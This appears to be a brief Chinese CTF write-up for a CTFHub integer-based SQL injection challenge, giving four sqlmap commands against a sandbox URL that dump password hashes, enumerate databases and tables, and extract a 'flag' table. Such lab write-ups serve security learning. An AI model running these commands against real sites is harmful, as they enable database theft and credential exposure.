【CTFHub】sql注入-整数型注入
2022-04-06 本文已影响0人
YukunWen
题目:
data:image/s3,"s3://crabby-images/bf84e/bf84e4f47592714e178767f31aeb4c31f4d8b7a2" alt=""
参考网站:
主要的解题点:
- 根据以往的知识,分析可以采用union的形式;
- 但是还是要善用工具,使用sqlmap可以一步到位
这里列明一些其中的关键步骤:
其实本题只要按照sqlmap官网上给出的demo操作即可
-
Step1:
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --password
图1. 破译密码
-
Step2:
python sqlmap.py -u "http://challenge5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dbs
data:image/s3,"s3://crabby-images/b4e3b/b4e3bd770410888b4c5757f42cf46fb19a04acea" alt=""
-
Step3:
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli
图3. tables情况
-
Step4:
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli
图4. 拖库